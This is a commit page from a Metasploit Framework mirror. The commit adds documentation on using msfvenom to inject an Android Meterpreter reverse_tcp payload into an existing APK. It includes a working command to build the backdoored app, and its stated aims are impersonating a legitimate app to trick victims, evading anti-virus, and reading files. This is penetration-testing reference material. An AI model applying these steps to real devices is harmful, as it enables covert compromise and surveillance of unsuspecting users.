infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10246, add documentation for APK injection

GSoC/Meterpreter_Web_Console
Brent Cook 2018-07-05 17:26:56 -05:00
parent 773d58f385 7fe41f5e4e
commit a18e4a7d5c
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 57 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
documentation/modules/payload/android/meterpreter/injection.md Normal file
View File

@ -0,0 +1,51 @@
You can inject the Android Meterpreter into an existing APK using msfvenom. This
will allow you to impersonate an existing application, which may make it easier
to convince your victim to install the APK.
## Vulnerable Application
It should be possible to inject Meterpreter into any APK, however some applications
have complex resource structures which may not work with `apktool`.
Additionally some applications have security measures that prevent the application
from working as expected once it has been modified.
**Finding APKs**
There are many websites that provide standalone APK that can be downloaded, e.g:
APKPure, APKMirror, RAW APK.
You can also build a simple application yourself with Android Studio.
Additionally you can pull APKs from a device connected via ADB:
```
$ adb shell pm list packages | grep app
package:com.existing.app
$ adb shell pm path com.existing.app
package:/data/app/com.existing.app-1/base.apk
$ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk
[100%] /data/app/com.existing.app-1/base.apk
```
## Requirements
APK Injection (as opposed to generating a single APK payload) requires a few tools
to be present on your command line already:
* [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
* [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates
* [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK
Installing these tools (if they are not installed already) will depend on your OS.
Apktool can be installed manually or automatically (e.g `brew install apktool`).
keytool and jarsigner can be installed by installing the appropriate JDK.
## Verification Steps
```
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
Next, start an Android device. Upload the APK, and execute it, as you would with
a [normal Android meterpreter APK](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md).

9
documentation/modules/payload/android/meterpreter/reverse_tcp.md
View File

@ -41,21 +41,24 @@ msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
msf payload(reverse_tcp) >
```
To create the APK with msfvenom:
### To create the APK with msfvenom:
```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
### To inject meterpreter into an existing APK with msfvenom:
You can also add Android meterpreter to any existing APK. This will make it harder for
Anti-virus software to detect the payload, and allow you read internal files and take
screenshots of the Android app you are backdooring:
screenshots of the Android app that you are backdooring:
```
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
[Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md).
Next, start an Android device. Upload the APK, and execute it. There are different ways to do this,
so please refer to the Scenarios section for more information.